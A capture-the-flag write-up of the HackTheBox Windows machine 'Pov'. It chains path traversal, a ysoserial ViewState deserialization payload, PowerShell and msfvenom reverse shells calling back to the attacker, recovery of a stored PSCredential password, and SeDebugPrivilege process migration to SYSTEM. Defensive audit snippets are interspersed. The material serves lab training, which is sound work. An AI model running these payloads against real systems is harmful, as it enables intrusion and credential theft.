HackTheBox Pov

Writeup for HackTheBox Pov

Machine Synopsis

Pov is a medium Windows machine that starts with a webpage featuring a business site. Enumerating the initial webpage, an attacker is able to find the subdomain dev.pov.htb. Navigating to the newly discovered subdomain, a download option is vulnerable to remote file read, giving an attacker the means to get valuable information from the web.config file. The subdomain uses the ViewState mechanism, which, in combination with the secrets leaked from the web.config file, is vulnerable to insecure deserialization, leading to remote code execution as the user sfitz. Looking at the remote filesystem, an attacker can discover and manipulate a file that reveals the credentials for the user alaading. Once the attacker has code execution as the user alaading the SeDebugPrivilege is abused to gain code execution in the context of a privileged application, ultimately resulting in code execution as nt authority\system. (Source)

Enumeration

```console
❯ nmap -p- --min-rate 10000 10.10.11.251

PORT   STATE SERVICE
80/tcp open  http

❯ nmap -p 80 -sCV 10.10.11.251

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: pov.htb
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

❯ echo -e '10.10.11.251\t\tpov.htb' | sudo tee -a /etc/hosts
10.10.11.251		pov.htb
```

Let's check out the webpage.

[Screenshot: webpage]

Nothing much of interest here. Let's fuzz for subdomains.

```console
❯ ffuf -u http://pov.htb -H "Host: FUZZ.pov.htb" -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -mc all -ac
...
dev         [Status: 302, Size: 152, Words: 9, Lines: 2, Duration: 462ms]
...
```

A dev subdomain is found. Add dev.pov.htb to /etc/hosts as well.

[Screenshot: dev_webpage]

Browsing around the site, the word ASP.NET is bolded in several places, which may be a hint.

[Screenshot: download_cv_button]

Before we look at this function, let's check for any interesting directories.

```console
❯ feroxbuster -u http://dev.pov.htb -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx
<nothing interesting>

❯ feroxbuster -u http://dev.pov.htb/portfolio -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -x aspx
<nothing interesting either>
```

OK, let's check out the Download CV function in Burp Suite.

Exploitation

[Screenshot: download_cv_request]

From the Burp request, we can see a ViewState and a file parameter. Let's test the file parameter for local file inclusion.

[Screenshot: download_cv_default_aspx]

It looks like we can grab other files on the web server. Let's try grabbing a Windows file.

[Screenshot: download_cv_etc_hosts]
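Added example, not the Pov application's code: the file parameter is joined to the web root without a containment check, which is what lets `..\web.config` walk up a directory. The function below is the hardened resolution a download handler should perform; the web root path is a hypothetical value.

```python
import posixpath

# Hypothetical web root for the demo; the real path on Pov is not known from the writeup.
WEB_ROOT = "/inetpub/wwwroot/portfolio"


class TraversalError(ValueError):
    """Raised when a requested file would resolve outside the web root."""


def resolve_download_path(web_root: str, requested: str) -> str:
    """Canonical path for `requested` under `web_root`, or TraversalError.

    The weak pattern is an unchecked join (web_root + user input), which lets
    "..\\web.config" walk up one level. The hardened version normalises both
    separators (IIS accepts '\\' and '/'), rejects absolute and drive-letter
    paths and NUL bytes, then verifies the canonical result is still inside
    the web root instead of just string-matching the prefix.
    """
    if not requested or "\x00" in requested:
        raise TraversalError("empty filename or NUL byte")
    candidate = requested.replace("\\", "/")
    if posixpath.isabs(candidate) or (len(candidate) > 1 and candidate[1] == ":"):
        raise TraversalError("absolute paths are not allowed")
    root = posixpath.normpath(web_root)
    full = posixpath.normpath(posixpath.join(root, candidate))
    if posixpath.commonpath([root, full]) != root:
        raise TraversalError(f"{requested!r} escapes {web_root}")
    return full


def is_allowed(requested: str, web_root: str = WEB_ROOT) -> bool:
    """True if the download handler should serve `requested`."""
    try:
        resolve_download_path(web_root, requested)
        return True
    except TraversalError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a legitimate CV, a harmless relative path, and the
    # traversal used in the writeup.
    samples = ["cv.pdf", "sub/../cv.pdf", "..\\web.config",
               "../../Windows/System32/drivers/etc/hosts", "C:\\Windows\\win.ini"]
    for name in samples:
        print(f"{name!r:50} allowed={is_allowed(name)}")
```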

Googling for "aspx config file" reveals that ASP.NET apps have a web.config file, which must be present at the content root path (typically the app base path) of the deployed app. Let's try to grab this file.

[Screenshot: download_cv_web_config]

```xml
<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" validation="SHA1" validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" />
  </system.web>
    <system.webServer>
        <httpErrors>
            <remove statusCode="403" subStatusCode="-1" />
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio" responseMode="Redirect" />
        </httpErrors>
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false" childOnly="true" />
    </system.webServer>
</configuration>
```

The web.config file contains the machineKey's decryptionKey and validationKey, which will be useful to us.
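Added example, not from the page or the target: a small audit script that flags the web.config settings that make this ViewState attack possible (static machineKey material and a legacy validation algorithm). The embedded web.config is a constructed sample modelled on the one above, with the key values replaced by placeholders.

```python
import xml.etree.ElementTree as ET
from typing import List, Optional

# Constructed sample modelled on the web.config recovered above, with the key
# material replaced by placeholders so the script runs offline.
SAMPLE_WEB_CONFIG = """<configuration>
  <system.web>
    <customErrors mode="On" defaultRedirect="default.aspx" />
    <httpRuntime targetFramework="4.5" />
    <machineKey decryption="AES" decryptionKey="DECRYPTION_KEY_PLACEHOLDER"
                validation="SHA1" validationKey="VALIDATION_KEY_PLACEHOLDER" />
  </system.web>
</configuration>"""

# Validation algorithms that predate the HMACSHA256 default of .NET 4.5.
LEGACY_VALIDATION = {"MD5", "SHA1", "3DES", "AES"}


def _is_autogenerated(value: Optional[str]) -> bool:
    # The ASP.NET default is "AutoGenerate,IsolateApps": the key is generated on
    # the machine and stored outside web.config, so a file read does not leak it.
    return value is None or value.strip().upper().startswith("AUTOGENERATE")


def audit_machine_key(web_config_xml: str) -> List[str]:
    """Return ViewState-related findings for a web.config document."""
    findings: List[str] = []
    root = ET.fromstring(web_config_xml)
    mk = root.find("./system.web/machineKey")
    if mk is not None:
        if not _is_autogenerated(mk.get("validationKey")):
            findings.append("static validationKey: whoever reads web.config can MAC a forged __VIEWSTATE")
        if not _is_autogenerated(mk.get("decryptionKey")):
            findings.append("static decryptionKey: ViewState encryption adds nothing once the file is read")
        algo = mk.get("validation", "HMACSHA256").upper()
        if algo in LEGACY_VALIDATION:
            findings.append(f"legacy validation algorithm {algo}; HMACSHA256 is the .NET 4.5 default")
    pages = root.find("./system.web/pages")
    if pages is not None and pages.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: ViewState is deserialized with no integrity check")
    return findings


if __name__ == "__main__":
    for finding in audit_machine_key(SAMPLE_WEB_CONFIG):
        print("[!]", finding)
```

Run it against a real web.config on a staging box; an empty list is what a hardened deployment (auto-generated keys, HMACSHA256, MAC enabled) should return.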

HackTricks explains that the ASP.NET ViewState parameter can be exploited with ysoserial when the machineKey is known.

Download the ysoserial release from GitHub to a local Windows machine.

Use the following ysoserial command to generate the malicious ViewState.

```powershell
PS> ./ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "ping 10.10.16.5"

XFouSlPUrt2U3BGCUd5YEK90pJE4EWKqhze20bRjoOAwBfCFUri%2FsEBtSkaF10LFeNKF4wGyXcVkgi3MkSuQ4%2BmItDgNR1tTrT8tecr5pSRUeEsj1akHzq9Zeo5ZZGFIK9zaylqI%2BUIlO3vd1XvBPWReixWtLmofGrY8e%2FJndzicdaDj9iQPYlRlrcpzBeSqYLw8c3b%2Bwnk1MOxfUqAIKKcDEy7P%2F9FhskOrydZr7v5e0cUfmsSKCnNcuwy32LxHj78CSXo%2Fb2h6eB9Js4E4KKKt79zkq%2ByqrgzelI6FbGzg7zM7Qp1o7K6BwHrawrucCCJxXe%2BrTjJjCmKdVi2ktUdXwqxqwu7ymXV2NhpjFdyMfFVel5PSXuARlLBEiZsOBiVL6ipKGjLizQZ%2FdAekl5I%2BMndD0zyhaCIFCFqEF2W5D30dRaILSkoOhKdOC0y53KhwFZJEKv3tWEfo6KMAprHAiQITQ7wyEV9S79HdLxDP0d3PQJ1mTSZXGcM%2B4mMl%2F2dHjLF%2FwRZMX8YfcPpQ5yk25sW%2B3bfpvJh%2Bo4DgSFZX0EebfPXNufrbasH0crXm7ZJJQjObfAyIOIIUYk6tO4vDjWW1dT%2Fdn8y9yb80MKgUUIdPtM4s%2BWTIYasVnV%2FLIowvwYbCJtjvZ9Uhkosk3yCL9ui%2FWWhTr2VtBH6t2cNraD9FwbRgoRDMiBqQhJUrzwowQfdxIwA%2BMrcLNqNMcKzzDXk%2FOUKsgkpymHoQKaReAssh30SqqLD91lelT4D4nmfsp1rO7DvIyGqxzYPgOi1KjZ1hbKHZ%2Bsbmwt3SCn1jR%2Bumo%2FSvl7gXXtB1pHkksHTm6rcmMu6saUAxh5RPjO60KRDoPwlis%2FxXSdFCDYUjvgg%2FKeuSGmsGZIxTxnD8E7WQA9JvFcxim847HcnPi75HuD395dDcyBeukGXNF2mVple2wIVTOUaMBYn7WKRelkVlyWY%2BA92qtDYFuI7xgl3O58NR9mgyNWhNLwz30WiRtY0cSTbJCPI1KJ234axEvCOvHAv%2FSSyxpp3G9Id2aUZk5m2MDsGLF%2FeJ%2FnoGWfRALWD1YW%2FToyg%2BaYHa8oOoYTXPTmJ8vNi3vQ7sjVsBq8jRJtyp%2Ft8LwNUtksmJw5aoHlIyr%2FGo0%2BykUcv8vPpOosP2CmCu0aNzmZUZVpOEWgkKacbHjgiy4fcOeWvH8VBQzLlrNNLAO2XyJXP5nxHJF5d6w8YtYryuOuALPz4W8ejVDB6gk7OqpxvW8yiqSzOAl5tJZDQDfJfNikUDdJg1foSeFR0bb8YrzATvX31rfXUgeCu3WfUc48h51HDo4v4RIj2dIcunNJbq8zH0NeCbz5EsH9xVoEaAZbangSd5lWhhzI22HnR%2F3wy9xc0Y1BKFs7qC1x3SAkvlG3pVMBv%2Bcj4Lqo%2B3xDDwbq4d6zk2akFaF4bKly74fgJqbe7Lfh%2F4b90xXk8%2BzwmgRbE6iZenA%2BEoKcOCsT%2FUTNW3mLPZsM5Ls8d4j67rwCUPBn95mymxF%2BMYGkqMlPeAGUG1Nm1CsVw1833NgV3ZwvBiVdTa6bDTAKx08yXgYYW9chJ0BDiYXCivKySHb1ZQY%2FHqYN4lSL0XDLSSgDFVDOcS%2B6vdkHj76D%2BRPFhvOk7C2VSwg%2FRTcoV4L9oSuVF9t6p%2BwRmn8wqPtndJyQdlMPlGVN2PCkI85DqrCYWjEQeciW8luDr9Is%2FEXbevm%2FAeDCfSTvEorbzZDIMQ%2FjttUQxVa8qutePtyMAufJXKjl5S9mZKSmj8tB3nkZsEEvXnEqLeXVQphY9tmqD%2B0%2BXUgF1eKQoDqASxv%2FA45d7bfFdMCpe4hcA5AWlqgdrESfvv7%2FWX1Lk7qS82sA%3D%3D
```

Start tcpdump to listen for the ping requests.

```console
sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
```

Replace the __VIEWSTATE value in the request with the generated one and check whether tcpdump picks up the ping requests.

```
__EVENTTARGET=download&__EVENTARGUMENT=&__VIEWSTATE=<new_malicious_ViewState_generated>&__VIEWSTATEGENERATOR=8E0F0FA3&__EVENTVALIDATION=6C4nwH5nLgn%2FvYqxWAmu69Dg1X3dS8pdMwc%2BYCh3w5d9d26F%2BqEaCvzAA1fpwD4HmFG5AcRzSxfTnKKkW%2Bs%2FScRCvulE5BjJVPkQ3hzIiFMJmO5pUIMjTPfSebfyrpOG0uGw1w%3D%3D&file=..\web.config
```

```console
IP pov.htb > shiro: ICMP echo request, id 1, seq 1, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 1, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 2, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 2, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 3, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 3, length 40
IP pov.htb > shiro: ICMP echo request, id 1, seq 4, length 40
IP shiro > pov.htb: ICMP echo reply, id 1, seq 4, length 40
```

Generate a PowerShell #3 (Base64) reverse shell payload on revshells and build a malicious ViewState carrying that payload.

```powershell
PS> ./ysoserial.exe -p ViewState -g WindowsIdentity --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" --path="/portfolio" -c "powershell -e <base64_encoded_reverse_shell>"
```

```console
sudo rlwrap -cAr nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.251] 49672
whoami
pov\sfitz
PS C:\windows\system32\inetsrv> 
```

Privilege Escalation

Let's enumerate the box for any interesting information.

```powershell
PS C:\windows\system32\inetsrv> cd C:\users
PS C:\users> ls
    Directory: C:\users
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/26/2023   4:31 PM                .NET v4.5
d-----       10/26/2023   4:31 PM                .NET v4.5 Classic
d-----       10/26/2023   4:21 PM                Administrator
d-----       10/26/2023   4:57 PM                alaading
d-r---       10/26/2023   2:02 PM                Public
d-----       12/25/2023   2:24 PM                sfitz
```

There is another user, alaading. Further enumeration turns up an interesting file, connection.xml, in C:\users\sfitz\Documents.

```powershell
PS C:\users> cd sfitz
PS C:\users\sfitz> cd Documents
PS C:\users\sfitz\Documents> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       12/25/2023   2:26 PM           1838 connection.xml

PS C:\users\sfitz\Documents> cat connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password"><encrypted_password_blob></SS>
    </Props>
  </Obj>
</Objs>
```

This is a PSCredential object serialized with Export-Clixml. The SS element is a SecureString protected with DPAPI under the exporting user's key, so any code running as sfitz on this host can recover it. Googling for "PSCredential get password" turns up a StackOverflow article on how to recover the plaintext.

```powershell
PS C:\users\sfitz\Documents> $cred = Import-Clixml .\connection.xml
PS C:\users\sfitz\Documents> $cred.GetNetworkCredential().password
f8gQ8fynP44ek1m3
```

Now that we have the password, we can try to execute commands as alaading.

```powershell
PS C:\users\sfitz\Documents> $username = 'alaading'
PS C:\users\sfitz\Documents> $password = 'f8gQ8fynP44ek1m3'
PS C:\users\sfitz\Documents> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force
PS C:\users\sfitz\Documents> $cred = New-Object System.Management.Automation.PSCredential($username, $securePassword)
PS C:\users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}
pov\alaading
```

Let's reuse the revshells payload we generated earlier to get another reverse shell.

```powershell
PS C:\users\sfitz\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {powershell -e <base64_encoded_reverse_shell>}
```

```console
sudo rlwrap -cAr nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.16.5] from (UNKNOWN) [10.10.11.251] 49680
whoami
pov\alaading
PS C:\Users\alaading\Documents> cd ../Desktop
PS C:\Users\alaading\Desktop> cat user.txt
9792d38fe39c3a968f2b909d53d208b0
```

Checking alaading's privileges reveals SeDebugPrivilege, which allows the holder to open and debug any process, including those running as SYSTEM.

```powershell
PS C:\Users\alaading\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State
============================= ============================== ========
SeDebugPrivilege              Debug programs                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
```

However, SeDebugPrivilege is listed as Disabled. A disabled privilege is still present in the token; it only needs to be enabled by the process that wants to use it. We can enable it by using RunasCs, a utility that runs a specified process with permissions different from the user's current logon, using explicit credentials.

Let's craft a malicious exe file and also grab the RunasCs binary from GitHub.

```console
❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.16.5 LPORT=8888 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: rev.exe

❯ wget https://github.com/antonioCoco/RunasCs/releases/download/v1.5/RunasCs.zip

❯ unzip RunasCs.zip
Archive:  RunasCs.zip
  inflating: RunasCs.exe
  inflating: RunasCs_net2.exe

❯ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
```

Start the exploit handler on Metasploit.

```console
❯ msfconsole -q
[*] Starting persistent handler(s)...
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.16.5:8888
```

Download rev.exe and RunasCs.exe to the victim machine.

Then execute rev.exe through RunasCs.exe as the alaading user.

```powershell
PS C:\Users\alaading\Documents> wget http://10.10.16.5/rev.exe -O rev.exe
PS C:\Users\alaading\Documents> wget http://10.10.16.5/RunasCs.exe -O RunasCs.exe
PS C:\Users\alaading\Documents> ls
Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/31/2025  12:17 AM           7168 rev.exe
-a----        1/31/2025  12:24 AM          51712 RunasCs.exe

PS C:\Users\alaading\Documents> .\RunasCs.exe alaading f8gQ8fynP44ek1m3 "C:\\Users\\alaading\\Documents\\rev.exe"
```

Check the exploit handler for the meterpreter shell.

```console
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.5:8888

msf6 exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.10.11.251
[*] Meterpreter session 2 opened (10.10.16.5:8888 -> 10.10.11.251:49688)

msf6 exploit(multi/handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeDebugPrivilege
SeIncreaseWorkingSetPrivilege

meterpreter > getuid
Server username: POV\alaading
```

Find a SYSTEM process and migrate into it. In this case, we migrate into winlogon.exe.

```console
meterpreter > ps
Process List
============
 PID   PPID  Name              Arch  Session  User          Path
 ---   ----  ----              ----  -------  ----          ----
 0     0     [System Process]
 4     0     System            x64   0
 88    4     Registry          x64   0
 276   4     smss.exe          x64   0
 344   624   svchost.exe       x64   0                      C:\Windows\System32\svchost.exe
 376   368   csrss.exe         x64   0
 476   624   svchost.exe       x64   0                      C:\Windows\System32\svchost.exe
 480   368   wininit.exe       x64   0
 488   472   csrss.exe         x64   1
 548   472   winlogon.exe      x64   1                      C:\Windows\System32\winlogon.exe
...

meterpreter > migrate 548
[*] Migrating from 4420 to 548...
[*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
Process 940 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.5329]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>type c:\users\administrator\desktop\root.txt
bcd5f4c8c9dd3253ea8d42a251df2b88
```

This post is licensed under CC BY 4.0 by the author.